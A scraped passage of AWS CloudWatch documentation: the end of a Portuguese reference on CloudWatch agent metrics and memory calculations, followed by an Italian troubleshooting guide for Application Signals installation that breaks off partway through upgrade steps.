essa métrica é Sum . Não use Average . net_drop_out O número de pacotes transmitidos por essa interface de rede que foram descartados. Unidade: Contagem A única estatística que deve ser usada para essa métrica é Sum . Não use Average . net_err_in O número de erros de recepção detectados por essa interface de rede. Unidade: Contagem A única estatística que deve ser usada para essa métrica é Sum . Não use Average . net_err_out O número de erros de transmissão detectados por essa interface de rede. Unidade: Contagem A única estatística que deve ser usada para essa métrica é Sum . Não use Average . net_packets_sent O número de pacotes enviados por essa interface de rede. Unidade: Contagem A única estatística que deve ser usada para essa métrica é Sum . Não use Average . net_packets_recv O número de pacotes recebidos por essa interface de rede. Unidade: Contagem A única estatística que deve ser usada para essa métrica é Sum . Não use Average . netstat_tcp_close O número de conexões de TCP sem estado. Unidade: Contagem netstat_tcp_close_wait O número de conexões de TCP esperando por uma solicitação de encerramento do cliente. Unidade: Contagem netstat_tcp_closing O número de conexões TCP que estão esperando por uma solicitação de encerramento com confirmação do cliente. Unidade: Contagem netstat_tcp_established O número de conexões de TCP estabelecidas. Unidade: Contagem netstat_tcp_fin_wait1 O número de conexões de TCP no estado FIN_WAIT1 durante o processo de encerramento de uma conexão. Unidade: Contagem netstat_tcp_fin_wait2 O número de conexões de TCP no estado FIN_WAIT2 durante o processo de encerramento de uma conexão. Unidade: Contagem netstat_tcp_last_ack O número de conexões TCP esperando que o cliente envie a confirmação da mensagem de encerramento da conexão. Este é o último estado logo antes que a conexão seja encerrada. Unidade: Contagem netstat_tcp_listen O número de portas TCP atualmente escutando uma solicitação de conexão. Unidade: Contagem netstat_tcp_none O número de conexões de TCP com clientes inativos. Unidade: Contagem netstat_tcp_syn_sent O número de conexões de TCP esperando por uma solicitação de conexão correspondente após enviar uma solicitação de conexão. Unidade: Contagem netstat_tcp_syn_recv O número de conexões TCP esperando por uma confirmação de solicitação de conexão depois de ter sido enviada e recebida uma solicitação de conexão. Unidade: Contagem netstat_tcp_time_wait O número de conexões TCP esperando, no momento, para garantir que o cliente tenha recebido a confirmação da solicitação de encerramento da conexão. Unidade: Contagem netstat_udp_socket O número de conexões de UDP atuais. Unidade: Contagem processes_blocked O número de processos que estão bloqueados. Unidade: Contagem processes_dead O número de processos que estão inativos, o que é indicado pelo código de estado X no Linux. Essa métrica não é coletada em computadores macOS. Unidade: Contagem processes_idle O número de processos que estão ociosos (em suspensão por mais de 20 segundos). Disponível apenas em instâncias do FreeBSD. Unidade: Contagem processes_paging O número de processos que estão em paginação, o que é indicado pelo código de estado W no Linux. Essa métrica não é coletada em computadores macOS. Unidade: Contagem processes_running O número de processos que estão em execução, indicado pelo código de estado R . Unidade: Contagem processes_sleeping O número de processos que estão em suspensão, indicado pelo código de estado S . Unidade: Contagem processes_stopped O número de processos que estão interrompidos, indicado pelo código de estado T . Unidade: Contagem processes_total O número total de processos na instância. Unidade: Contagem processes_total_threads O número total de threads que compõem os processos. Essa métrica está disponível apenas em instâncias do Linux. Essa métrica não é coletada em computadores macOS. Unidade: Contagem processes_wait O número de processos que estão em paginação, o que é indicado pelo código de estado W em instâncias do FreeBSD. Essa métrica está disponível apenas em instâncias do FreeBSD e não está disponível em instâncias do Linux, Windows Server ou macOS. Unidade: Contagem processes_zombies O número de processos zumbi, indicado pelo código de estado Z . Unidade: Contagem swap_free A quantidade de espaço de troca que não está em uso. Unidade: bytes swap_used A quantidade de espaço de troca em uso no momento. Unidade: bytes swap_used_percent O percentual de espaço de troca em uso no momento. Unidade: Percentual Definições de métricas de memória coletadas pelo agente do CloudWatch Quando o agente do CloudWatch coleta métricas de memória, a origem é o subsistema de gerenciamento de memória do host. Por exemplo, o kernel do Linux expõe dados mantidos pelo sistema operacional em /proc . Para a memória, os dados estão em /proc/meminfo . Cada sistema operacional e arquitetura diferente tem cálculos diferentes dos recursos usados pelos processos. Para obter mais informações, consulte as seções a seguir. Durante cada intervalo de coleta, o agente do CloudWatch em cada instância coleta os recursos da instância e calcula os recursos que estão sendo usados por todos os processos que estão sendo executados nessa instância. Essas informações são relatadas de volta para as métricas do CloudWatch. É possível configurar a duração do intervalo de coleta no arquivo de configuração do agente do CloudWatch. Para obter mais informações, consulte Arquivo de configuração do atendente do CloudWatch: seção do atendente . A lista a seguir explica como as métricas de memória que o agente do CloudWatch coleta são definidas. Memória ativa : memória que está sendo usada por um processo. Em outras palavras, a memória usada pelas aplicações em execução no momento. Memória disponível : a memória que pode ser fornecida instantaneamente aos processos sem que o sistema entre em swap (também conhecida como memória virtual). Memória em buffer : a área de dados compartilhada por dispositivos de hardware ou processos de programas que operam em velocidades e prioridades diferentes. Memória em cache : armazena instruções e dados do programa que são usados repetidamente na operação dos programas que a CPU provavelmente precisará em seguida. Memória livre : memória que não está sendo usada e está prontamente disponível. É totalmente livre para que o sistema a use quando necessário. Memória inativa : páginas que não foram acessadas "recentemente". Memória total : o tamanho real da memória física RAM. Memória usada : memória que está sendo usada atualmente por programas e processos. Tópicos Linux: métricas coletadas e cálculos usados macOS: métricas coletadas e cálculos usados Windows: métricas coletadas Exemplo: cálculo de métricas de memória no Linux Linux: métricas coletadas e cálculos usados Métricas coletadas e unidades: Ativa (bytes) Disponível (bytes) Percentual disponível (percentual) Em buffer (bytes) Em cache (bytes) Livre (bytes) Inativa (bytes) Total (bytes) Usada (bytes) Percentual usado (percentual) Memória usada = Memória total - Memória livre - Memória em cache - Memória em buffer Memória total = Memória usada + Memória livre + Memória em cache + Memória em buffer macOS: métricas coletadas e cálculos usados Métricas coletadas e unidades: Ativa (bytes) Disponível (bytes) Percentual disponível (percentual) Livre (bytes) Inativa (bytes) Total (bytes) Usada (bytes) Percentual usado (percentual) Memória disponível = Memória livre + Memória inativa Memória usada = Memória total - Memória disponível Memória total = Memória disponível + Memória usada Windows: métricas coletadas As métricas coletadas nos hosts Windows estão listadas abaixo. Todas essas métricas têm None para Unit . Bytes disponíveis Falhas de cache/seg Falhas de página/seg Páginas/seg Não há cálculos usados para métricas do Windows porque o agente do CloudWatch analisa eventos usando contadores de performance. Exemplo: cálculo de métricas de memória no Linux Como exemplo, suponha que a inserção do comando cat /proc/meminfo em um host Linux mostre os resultados a seguir: MemTotal: 3824388 kB MemFree: 462704 kB MemAvailable: 2157328 kB Buffers: 126268 kB Cached: 1560520 kB SReclaimable: 289080 kB> Neste exemplo, o agente do CloudWatch coletará os valores a seguir. Todos os valores que o agente do CloudWatch coleta e reporta estão em bytes. mem_total : 3916173312 bytes mem_available : 2209103872 bytes (MemFree+ em cache) mem_free : 473808896 bytes mem_cached : 1893990400 bytes ( cached + SReclaimable mem_used : 1419075584 bytes ( MemTotal – ( MemFree + Buffers + ( Cached + SReclaimable ))) mem_buffered : 129667072 bytes mem_available_percent : 56,41% mem_used_percent : 36,24% ( mem_used / mem_total ) * 100 O Javascript está desativado ou não está disponível no seu navegador. Para usar a documentação da AWS, o Javascript deve estar ativado. Consulte as páginas de Ajuda do navegador para obter instruções. Convenções do documento Iniciar o atendente do CloudWatch Usar o agente do CloudWatch com a telemetria relacionada Essa página foi útil? - Sim Obrigado por nos informar que estamos fazendo um bom trabalho! Se tiver tempo, conte-nos sobre o que você gostou para que possamos melhorar ainda mais. Essa página foi útil? - Não Obrigado por nos informar que precisamos melhorar a página. Lamentamos ter decepcionado você. Se tiver tempo, conte-nos como podemos melhorar a documentação. | 2026-01-13T09:29:26 |
https://docs.aws.amazon.com/it_it/AmazonCloudWatch/latest/monitoring/CloudWatch-Application-Signals-Enable-Troubleshoot.html | Risoluzione dei problemi relativi all'installazione di Application Signals - Amazon CloudWatch Risoluzione dei problemi relativi all'installazione di Application Signals - Amazon CloudWatch Documentazione Amazon CloudWatch Guida per l’utente OpenTelemetry Risolvi i conflitti di configurazione in Amazon EKS con Application Signals Prestazioni di avvio a freddo del livello Java di Application Signals L'applicazione non si avvia dopo l'abilitazione di Application Signals L'applicazione Python non si avvia dopo l'abilitazione di Application Signals Nessun dato di Application Signals per l'applicazione Python che utilizza un server WSGI La mia applicazione Node.js non è instrumentata o non genera telemetria Application Signals La mia applicazione.NET non è dotata di strumentazione o si interrompe per le chiamate SDK AWS Nessun dato applicativo nel pannello di controllo di Application Signals I valori delle metriche del servizio o di dipendenza sono sconosciuti Gestione di un ConfigurationConflict durante la gestione del componente aggiuntivo Amazon CloudWatch Observability EKS Voglio filtrare le metriche e le tracce non necessarie Che cosa significa InternalOperation? Come posso abilitare la registrazione per le applicazioni .NET? Come posso risolvere i conflitti tra le versioni dell'assemblaggio nelle applicazioni .NET? Posso disabilitare FluentBit? Posso filtrare i log dei contenitori prima di esportarli in Logs? CloudWatch Risoluzione TypeError quando si utilizza AWS Distro for OpenTelemetry (ADOT) Lambda Layer JavaScript TypeError quando si utilizzano gestori Response Streaming Lambda con AWS Distro for ( OpenTelemetry ADOT) Lambda Layer JavaScript Aggiornamento alle versioni richieste degli agenti o del componente aggiuntivo Amazon EKS Embedded Metric Format (EMF) disabilitato per Application Signals Le traduzioni sono generate tramite traduzione automatica. In caso di conflitto tra il contenuto di una traduzione e la versione originale in Inglese, quest'ultima prevarrà. Risoluzione dei problemi relativi all'installazione di Application Signals Questa sezione contiene suggerimenti per la risoluzione dei problemi relativi a CloudWatch Application Signals. Argomenti OpenTelemetry Risolvi i conflitti di configurazione in Amazon EKS con Application Signals Prestazioni di avvio a freddo del livello Java di Application Signals L'applicazione non si avvia dopo l'abilitazione di Application Signals L'applicazione Python non si avvia dopo l'abilitazione di Application Signals Nessun dato di Application Signals per l'applicazione Python che utilizza un server WSGI La mia applicazione Node.js non è instrumentata o non genera telemetria Application Signals La mia applicazione.NET non è dotata di strumentazione o si interrompe per le chiamate SDK AWS Nessun dato applicativo nel pannello di controllo di Application Signals I valori delle metriche del servizio o di dipendenza sono sconosciuti Gestione di un ConfigurationConflict durante la gestione del componente aggiuntivo Amazon CloudWatch Observability EKS Voglio filtrare le metriche e le tracce non necessarie Che cosa significa InternalOperation? Come posso abilitare la registrazione per le applicazioni .NET? Come posso risolvere i conflitti tra le versioni dell'assemblaggio nelle applicazioni .NET? Posso disabilitare FluentBit? Posso filtrare i log dei contenitori prima di esportarli in Logs? CloudWatch Risoluzione TypeError quando si utilizza AWS Distro for OpenTelemetry (ADOT) Lambda Layer JavaScript TypeError quando si utilizzano gestori Response Streaming Lambda con AWS Distro for ( OpenTelemetry ADOT) Lambda Layer JavaScript Aggiornamento alle versioni richieste degli agenti o del componente aggiuntivo Amazon EKS Embedded Metric Format (EMF) disabilitato per Application Signals OpenTelemetry Risolvi i conflitti di configurazione in Amazon EKS con Application Signals Se utilizzi OpenTelemetry (OTel) per il monitoraggio delle prestazioni delle applicazioni (APM) con Amazon EKS e configuri endpoint di esportazione OTLP personalizzati diversi dagli CloudWatch endpoint, potresti riscontrare i seguenti comportamenti dopo l'installazione o l'aggiornamento alla versione 5.0.0 o successiva del componente aggiuntivo Observability: CloudWatch Interruzione della OTel telemetria esistente: il componente aggiuntivo Observability può sostituire gli endpoint OTLP Exporter che hai codificato nella tua applicazione. CloudWatch Questa sostituzione non influisce sugli endpoint configurati tramite variabili di ambiente del contenitore o. envFrom ConfigMap Se sostituite, le metriche e le tracce potrebbero non raggiungere la destinazione prevista. Per mantenere la configurazione APM esistente dopo l'aggiornamento alla versione 5.0.0 o successiva, consulta Disattiva Application Signals Application Signals potrebbe non funzionare se in precedenza hai abilitato Application Signals utilizzando il componente aggiuntivo CloudWatch Observability e hai configurato un endpoint OTLP personalizzato. Per risolvere questo problema, rimuovi gli endpoint OTLP personalizzati o imposta la variabile di ambiente OTEL_AWS_APPLICATION_SIGNALS_ENABLED=true durante l'installazione o l'aggiornamento alla versione 5.0.0 o successiva Prestazioni di avvio a freddo del livello Java di Application Signals L'aggiunta del livello Application Signals alle funzioni Java Lambda aumenta la latenza di avvio (tempo di avvio a freddo). I seguenti suggerimenti possono aiutare a ridurre la latenza per le funzioni sensibili al fattore tempo. Avvio rapido per agente Java : il livello Java Lambda di Application Signals include una funzionalità di avvio rapido che per impostazione predefinita è disattivata, ma che può essere abilitata impostando la variabile OTEL_JAVA_AGENT_FAST_STARTUP_ENABLED su true. Se abilitata, questa funzionalità configura la JVM per utilizzare il compilatore C1 di livello 1 di compilazione a più livelli per generare codice nativo ottimizzato rapido per velocizzare gli avvii a freddo. Il compilatore C1 dà priorità alla velocità a scapito dell'ottimizzazione a lungo termine, mentre il compilatore C2 offre prestazioni complessive superiori profilando i dati nel tempo. Per ulteriori informazioni, consulta Fast startup for Java agent . Riduci i tempi di avvio a freddo con Provisioned Concurrency: AWS Lambda provisioned Concurrency prealloca un numero specifico di istanze di funzione, mantenendole inizializzate e pronte a gestire immediatamente le richieste. Ciò riduce i tempi di avvio a freddo eliminando la necessità di inizializzare l'ambiente della funzione durante l'esecuzione e garantendo prestazioni più rapide e coerenti, in particolare per i carichi di lavoro sensibili alla latenza. Per ulteriori informazioni, consulta Configuring provisioned concurrency for a function . Ottimizza le prestazioni di avvio con Lambda SnapStart : AWS Lambda SnapStart è una funzionalità che ottimizza le prestazioni di avvio delle funzioni Lambda creando un'istantanea preinizializzata dell'ambiente di esecuzione dopo la fase di inizializzazione della funzione. Questo snapshot viene quindi riutilizzato per avviare nuove istanze, riducendo in modo significativo i tempi di avvio a freddo saltando il processo di inizializzazione durante l'invocazione della funzione. Per informazioni, consulta Migliorare le prestazioni di avvio con Lambda SnapStart L'applicazione non si avvia dopo l'abilitazione di Application Signals Se l'applicazione su un cluster Amazon EKS non si avvia dopo aver abilitato Application Signals sul cluster, verifica quanto segue: Verifica se l'applicazione è stata strumentata da un'altra soluzione di monitoraggio. Application Signals potrebbe non supportare la coesistenza con altre soluzioni di instrumentazione. Verifica che l'applicazione soddisfi i requisiti di compatibilità per utilizzare Application Signals. Per ulteriori informazioni, consulta Sistemi supportati . Se l'applicazione non è riuscita a recuperare gli artefatti di Application Signals come l'agente AWS Distro for Java OpenTelemetery o Python e CloudWatch le immagini degli agenti, potrebbe trattarsi di un problema di rete. Per mitigare il problema, rimuovi l'annotazione instrumentation.opentelemetry.io/inject-java: "true" o instrumentation.opentelemetry.io/inject-python: "true" dal manifesto di implementazione dell'applicazione e implementa nuovamente l'applicazione. Quindi controlla se l'applicazione funziona. Problemi noti È noto che la raccolta di metriche di runtime nella versione Java SDK v1.32.5 non funziona con le applicazioni che utilizzano Wildfly. JBoss Questo problema si estende al componente aggiuntivo Amazon CloudWatch Observability EKS, interessando le versioni successive 2.3.0-eksbuild.1 . 2.5.0-eksbuild.1 Se riscontri problemi, esegui il downgrade della versione o disabilita la raccolta delle metriche di runtime aggiungendo la variabile di ambiente OTEL_AWS_APPLICATION_SIGNALS_RUNTIME_ENABLED=false all'applicazione. L'applicazione Python non si avvia dopo l'abilitazione di Application Signals È un problema noto nella OpenTelemetry strumentazione automatica che una variabile di PYTHONPATH ambiente mancante a volte può causare il mancato avvio dell'applicazione. Per risolvere questo problema, assicurati di impostare la variabile di ambiente PYTHONPATH sulla posizione della directory di lavoro dell'applicazione. Per ulteriori informazioni su questo problema, consulta Python autoinstrumentation setting of PYTHONPATH is not compliant with Python's module resolution behavior, breaking Django applications . Per le applicazioni Django, ci sono configurazioni aggiuntive richieste, che sono descritte nella documentazione di Python OpenTelemetry . Usa il flag --noreload per impedire il ricaricamento automatico. Imposta la variabile di ambiente DJANGO_SETTINGS_MODULE sulla posizione del file settings.py dell'applicazione Django. Ciò garantisce che OpenTelemetry possa accedere e integrarsi correttamente con le impostazioni di Django. Nessun dato di Application Signals per l'applicazione Python che utilizza un server WSGI Se si utilizza un server WSGI come Gunicorn o uWSGI, è necessario apportare ulteriori modifiche per far funzionare l'instrumentazione automatica di ADOT Python. Nota Assicurati di utilizzare la versione più recente di ADOT Python e il componente aggiuntivo CloudWatch Amazon Observability EKS prima di procedere. Passaggi aggiuntivi per abilitare Application Signals con un server WSGI Importa l'instrumentazione automatica nei processi di lavoro biforcati. Per Gunicorn, usa l'hook post_fork : # gunicorn.conf.py def post_fork(server, worker): from opentelemetry.instrumentation.auto_instrumentation import sitecustomize Per uWSGI, usa la direttiva import . # uwsgi.ini [uwsgi] ; required for the instrumentation of worker processes enable-threads = true lazy-apps = true import = opentelemetry.instrumentation.auto_instrumentation.sitecustomize Abilita la configurazione per l'instrumentazione automatica di ADOT Python per saltare il processo principale e rimandarlo ai worker impostando la variabile di ambiente OTEL_AWS_PYTHON_DEFER_TO_WORKERS_ENABLED su true . La mia applicazione Node.js non è instrumentata o non genera telemetria Application Signals Per abilitare Application Signals per Node.js, è necessario assicurarsi che l'applicazione Node.js utilizzi il formato del modulo CommonJS (CJS). Il AWS Distro for OpenTelemetry Node.js non supporta il formato del modulo ESM, poiché il supporto di ESM OpenTelemetry JavaScript è sperimentale ed è in corso di elaborazione. Per determinare se la tua applicazione utilizza CJS e non ESM, assicurati che l'applicazione non soddisfi le condizioni per abilitare ESM. La mia applicazione.NET non è dotata di strumentazione o si interrompe per le chiamate SDK AWS L'SDK AWS Distro for Open Telemetry (ADOT) per .NET non supporta SDK per .NET V4. AWS Utilizza AWS SDK .NET V3 per il supporto completo di Application Signals. Nessun dato applicativo nel pannello di controllo di Application Signals Se nei pannelli di controllo di Application Signals mancano parametri o tracce, le cause potrebbero essere le seguenti. Esamina queste cause solo se hai atteso per 15 minuti che Application Signals raccogliesse e visualizzasse i dati dall'ultimo aggiornamento. Assicurati che la libreria e il framework che stai utilizzando siano supportati dall'agente Java ADOT. Per ulteriori informazioni, consulta Librerie/framework . Assicurati che l' CloudWatch agente sia in esecuzione. Per prima cosa controlla lo stato dei pod degli CloudWatch agenti e assicurati che siano tutti a Running posto. kubectl -n amazon-cloudwatch get pods. Aggiungi quanto segue al file di configurazione dell' CloudWatch agente per abilitare i log di debug, quindi riavvia l'agente. "agent": { "region": "$ { REGION}", "debug": true }, Quindi verifica la presenza di errori nei pod dell'agente. CloudWatch Verifica la presenza di problemi di configurazione con l' CloudWatch agente. Verificate che quanto segue sia ancora presente nel file di configurazione dell' CloudWatch agente e che l'agente sia stato riavviato da quando è stato aggiunto. "agent": { "region": "$ { REGION}", "debug": true }, Quindi controlla i registri di OpenTelemetry debug per verificare la presenza di messaggi di errore come. ERROR io.opentelemetry.exporter.internal.grpc.OkHttpGrpcExporter - Failed to export ... Questi messaggi potrebbero indicare il problema. Se questo non risolve il problema, scarica e controlla le variabili di ambiente con nomi che iniziano con OTEL_ descrivendo il pod con il comando kubectl describe pod . Per abilitare la registrazione di debug in OpenTelemetry Python, imposta la variabile di ambiente su debug e ridistribuisci l' OTEL_PYTHON_LOG_LEVEL applicazione. Verifica la presenza di autorizzazioni errate o insufficienti per l'esportazione dei dati dall'agente. CloudWatch Se vedi Access Denied dei messaggi nei registri degli CloudWatch agenti, questo potrebbe essere il problema. È possibile che le autorizzazioni applicate durante l'installazione dell' CloudWatch agente siano state successivamente modificate o revocate. Verifica la presenza di un problema relativo a AWS Distro for OpenTelemetry (ADOT) durante la generazione di dati di telemetria. Assicurati che le annotazioni sulla strumentazione instrumentation.opentelemetry.io/inject-java e sidecar.opentelemetry.io/inject-java vengano applicate alla distribuzione dell'applicazione e che il valore sia true . Senza questi, i pod dell'applicazione non saranno dotati di strumenti anche se il componente aggiuntivo ADOT è installato correttamente. Quindi, controlla se il container init è applicato all'applicazione e lo stato di Ready è True . Se il container init non è pronto, verifica lo stato del motivo. Se il problema persiste, abilita la registrazione di debug su OpenTelemetry Java SDK impostando la variabile di ambiente su true e ridistribuendo l'applicazione. OTEL_JAVAAGENT_DEBUG Quindi cerca i messaggi che iniziano con ERROR io.telemetry . È possibile che l'esportatore stia eliminando i dati. metric/span Per scoprirlo, controlla il log dell'applicazione per i messaggi che includono Failed to export... L' CloudWatch agente potrebbe subire delle limitazioni durante l'invio di metriche o intervalli ad Application Signals. Verifica la presenza di messaggi che indicano una limitazione nei registri degli agenti. CloudWatch Assicurati di aver abilitato la configurazione di rilevamento servizi. È necessario eseguire questa operazione solo una volta nella Regione in uso. Per confermare ciò, nella CloudWatch console scegli Application Signals , Services. Se il Passaggio 1 non è contrassegnato come Completo , scegli Scoperta dei servizi . I dati dovrebbero iniziare ad arrivare entro cinque minuti. I valori delle metriche del servizio o di dipendenza sono sconosciuti Se vedi UnknownService , UnknownOperation UnknownRemoteService , o UnknownRemoteOperation per un nome o un'operazione di dipendenza nei dashboard di Application Signals, controlla se la presenza di punti dati per il servizio remoto sconosciuto e il funzionamento remoto sconosciuto coincidono con le relative distribuzioni. UnknownService significa che il nome di un'applicazione strumentata è sconosciuto. Se la variabile di ambiente OTEL_SERVICE_NAME non è definita e service.name non è specificato in OTEL_RESOURCE_ATTRIBUTES , il nome del servizio è impostato su UnknownService . Per risolvere questo problema, specifica il nome del servizio in OTEL_SERVICE_NAME o OTEL_RESOURCE_ATTRIBUTES . UnknownOperation significa che il nome di un'operazione richiamata è sconosciuto. Ciò si verifica quando Application Signals non è in grado di rilevare il nome di un'operazione che invoca la chiamata remota o quando il nome dell'operazione estratto contiene valori di cardinalità elevati. UnknownRemoteService significa che il nome del servizio di destinazione è sconosciuto. Ciò si verifica quando il sistema non è in grado di estrarre il nome del servizio di destinazione a cui accede la chiamata remota. Una soluzione consiste nel creare un intervallo personalizzato attorno alla funzione che invia la richiesta e aggiungere l'attributo aws.remote.service con il valore designato. Un'altra opzione è configurare l' CloudWatch agente per personalizzare il valore metrico di RemoteService . Per ulteriori informazioni sulle personalizzazioni nell' CloudWatch agente, consulta. Abilita CloudWatch Application Signals UnknownRemoteOperation significa che il nome dell'operazione di destinazione è sconosciuto. Ciò si verifica quando il sistema non è in grado di estrarre il nome dell'operazione di destinazione a cui accede la chiamata remota. Una soluzione consiste nel creare un intervallo personalizzato attorno alla funzione che invia la richiesta e aggiungere l'attributo aws.remote.operation con il valore designato. Un'altra opzione è configurare l' CloudWatch agente per personalizzare il valore metrico di RemoteOperation . Per ulteriori informazioni sulle personalizzazioni nell' CloudWatch agente, consulta. Abilita CloudWatch Application Signals Gestione di un ConfigurationConflict durante la gestione del componente aggiuntivo Amazon CloudWatch Observability EKS Quando installi o aggiorni il componente aggiuntivo Amazon CloudWatch Observability EKS, se noti un errore causato da un Health Issue di tipo ConfigurationConflict con una descrizione che inizia con Conflicts found when trying to apply. Will not continue due to resolve conflicts mode , è probabile che l' CloudWatch agente e i relativi componenti associati, come il ServiceAccount, il ClusterRole e il, siano ClusterRoleBinding installati nel cluster. Quando il componente aggiuntivo tenta di installare l' CloudWatch agente e i componenti associati, se rileva modifiche nei contenuti, per impostazione predefinita fallisce l'installazione o l'aggiornamento per evitare di sovrascrivere lo stato delle risorse sul cluster. Se stai tentando di effettuare l'onboarding al componente aggiuntivo Amazon CloudWatch Observability EKS e riscontri questo errore, ti consigliamo di eliminare una configurazione di CloudWatch agente esistente che avevi precedentemente installato sul cluster e quindi di installare il componente aggiuntivo EKS. Assicurati di eseguire il backup di tutte le personalizzazioni che potresti aver apportato alla configurazione originale dell' CloudWatch agente, ad esempio una configurazione personalizzata dell'agente, e di fornirle al componente aggiuntivo Amazon CloudWatch Observability EKS alla prossima installazione o aggiornamento. Se in precedenza avevi installato l' CloudWatch agente per l'onboarding su Container Insights, consulta per ulteriori informazioni. Eliminazione dell' CloudWatch agente e di Fluent Bit for Container Insights In alternativa, il componente aggiuntivo supporta un'opzione di configurazione per la risoluzione dei conflitti che può specificare OVERWRITE . È possibile utilizzare questa opzione per procedere con l'installazione o l'aggiornamento del componente aggiuntivo sovrascrivendo i conflitti nel cluster. Se utilizzi la console Amazon EKS, trovi il metodo di risoluzione dei conflitti selezionando le impostazioni di configurazione facoltative quando crei o aggiorni il componente aggiuntivo. Se utilizzi il AWS CLI, puoi fornire il comando --resolve-conflicts OVERWRITE al tuo comando per creare o aggiornare il componente aggiuntivo. Voglio filtrare le metriche e le tracce non necessarie Se Application Signals sta raccogliendo tracce e metriche che non desideri, consulta Gestione di operazioni ad alta cardinalità per informazioni sulla configurazione dell' CloudWatch agente con regole personalizzate per ridurre la cardinalità. Per ulteriori informazioni sulla personalizzazione delle regole di campionamento in tracce, consulta Configure sampling rules nella documentazione di X-Ray. Che cosa significa InternalOperation ? InternalOperation è un'operazione che viene attivata dall'applicazione internamente anziché da un'invocazione esterna. La visualizzazione di InternalOperation è il comportamento previsto ed è indicazione di integrità. Alcuni esempi tipici in cui potresti vedere InternalOperation includono quanto segue: Precaricamento all'avvio : l'applicazione esegue un'operazione denominata loadDatafromDB che legge i metadati da un database durante la fase di riscaldamento. Invece di vedere loadDatafromDB come operazione di servizio, la vedrai classificata come InternalOperation . Esecuzione asincrona in background : l'applicazione si abbona a una coda di eventi ed elabora i dati in streaming di conseguenza ogni volta che viene effettuato un aggiornamento. Ogni operazione attivata verrà eseguita sotto InternalOperation come operazione di servizio. Recupero delle informazioni sull'host da un registro dei servizi : l'applicazione comunica con un registro dei servizi per il rilevamento servizi. Tutte le interazioni con il sistema di rilevamento sono classificate come InternalOperation . Come posso abilitare la registrazione per le applicazioni .NET? Per abilitare la registrazione per le applicazioni .NET, configura le seguenti variabili di ambiente. Per ulteriori informazioni su come configurare queste variabili di ambiente, consulta Risoluzione dei problemi relativi alla strumentazione automatica.NET nella documentazione. OpenTelemetry OTEL_LOG_LEVEL OTEL_DOTNET_AUTO_LOG_DIRECTORY COREHOST_TRACE COREHOST_TRACEFILE Come posso risolvere i conflitti tra le versioni dell'assemblaggio nelle applicazioni .NET? Se viene visualizzato il seguente errore, consulta Conflitti tra versioni di Assembly nella OpenTelemetry documentazione per i passaggi di risoluzione. Unhandled exception. System.IO.FileNotFoundException: Could not load file or assembly 'Microsoft.Extensions.DependencyInjection.Abstractions, Version=7.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60'. The system cannot find the file specified. File name: 'Microsoft.Extensions.DependencyInjection.Abstractions, Version=7.0.0.0, Culture=neutral, PublicKeyToken=adb9793829ddae60' at Microsoft.AspNetCore.Builder.WebApplicationBuilder..ctor(WebApplicationOptions options, Action`1 configureDefaults) at Microsoft.AspNetCore.Builder.WebApplication.CreateBuilder(String[] args) at Program.<Main>$(String[] args) in /Blog.Core/Blog.Core.Api/Program.cs:line 26 Posso disabilitare FluentBit? Puoi disabilitarlo FluentBit configurando il componente aggiuntivo Amazon CloudWatch Observability EKS. Per ulteriori informazioni, consulta (Facoltativo) Configurazione aggiuntiva . Posso filtrare i log dei contenitori prima di esportarli in Logs? CloudWatch No, il filtraggio dei log dei container non è ancora supportato. Risoluzione TypeError quando si utilizza AWS Distro for OpenTelemetry (ADOT) Lambda Layer JavaScript La tua funzione Lambda potrebbe fallire con questo errore: TypeError - "Cannot redefine property: handler" quando: Usa il layer ADOT JavaScript Lambda Usa per compilare esbuild TypeScript Si esporta il gestore con la parola chiave export L'ADOT JavaScript Lambda Layer deve modificare il gestore in fase di esecuzione. Quando si utilizza la export parola chiave with esbuild (direttamente o tramite AWS CDK), esbuild rende il gestore immutabile, impedendo queste modifiche. Esporta la tua funzione di gestione utilizzando module.exports invece della parola chiave export : // Before export const handler = (event) => { // Handler Code } // After const handler = async (event) => { // Handler Code } module.exports = { handler } TypeError quando si utilizzano gestori Response Streaming Lambda con AWS Distro for ( OpenTelemetry ADOT) Lambda Layer JavaScript La tua funzione Lambda potrebbe fallire con questo errore: TypeError - "responseStream.write is not a function" quando: Usa ADOT JavaScript Lambda Layer con AWS Lambda Instrumentation abilitata (abilitata per impostazione predefinita) Utilizzo della funzionalità di streaming delle risposte nei runtime gestiti di Node.js. Ad esempio, quando il gestore delle funzioni è simile a: * export const handler = awslambda.streamifyResponse(...) La strumentazione AWS Lambda nell'ADOT JavaScript Lambda Layer attualmente non supporta lo streaming di risposte nei runtime gestiti di Node.js, quindi deve essere disabilitata per evitare che ciò si verifichi. TypeError Aggiornamento alle versioni richieste degli agenti o del componente aggiuntivo Amazon EKS Dopo il 9 agosto 2024, CloudWatch Application Signals non supporterà più le versioni precedenti del componente aggiuntivo Amazon CloudWatch Observability EKS, dell' CloudWatch agente e dell'agente AWS Distro per la strumentazione automatica. OpenTelemetry Per il componente aggiuntivo Amazon CloudWatch Observability EKS, le versioni precedenti a v1.7.0-eksbuild.1 non saranno supportate. Per l' CloudWatch agente, le versioni precedenti a 1.300040.0 non saranno supportate. Per l'agente AWS Distro for OpenTelemetry autostrumentation: Per Java, le versioni precedenti alla 1.32.2 non sono supportate. Per Python, le versioni precedenti alla 0.2.0 non sono supportate. Per .NET, le versioni precedenti alla 1.3.2 non sono supportate. Per Node.js, le versioni precedenti alla 0.3.0 non sono supportate. Importante Le versioni più recenti degli agenti includono aggiornamenti allo schema delle metriche di Application Signals. Questi aggiornamenti non sono compatibili con le versioni precedenti e ciò può causare problemi di dati se vengono utilizzate versioni incompatibili. Per garantire una transizione ottimale alla nuova funzionalità, effettua le seguenti operazioni: Se la tua applicazione è in esecuzione su Amazon EKS, assicurati di riavviare tutte le applicazioni strumentate dopo aver aggiornato il componente aggiuntivo Amazon CloudWatch Observability. Per le applicazioni in esecuzione su altre piattaforme, assicurati di aggiornare sia l' CloudWatch agente che l'agente di AWS OpenTelemetry strumentazione automatica alle versioni più recenti. Le istruzioni nelle sezioni seguenti possono aiutarti a eseguire l'aggiornamento a una versione supportata. Indice Aggiorna il componente aggiuntivo Amazon CloudWatch Observability EKS Utilizzo della console Usa il AWS CLI Aggiorna l' CloudWatch agente e l'agente ADOT Aggiornamento su Amazon ECS Aggiornamento su Amazon EC2 o altre architetture Aggiorna il componente aggiuntivo Amazon CloudWatch Observability EKS Per il componente aggiuntivo Amazon CloudWatch Observability EKS, puoi utilizzare Console di gestione AWS o il. AWS CLI Utilizzo della console Per aggiornare il componente aggiuntivo utilizzando la console Apri la console Amazon EKS a https://console.aws.amazon.com/eks/home#/clusters . Scegli il nome del cluster Amazon 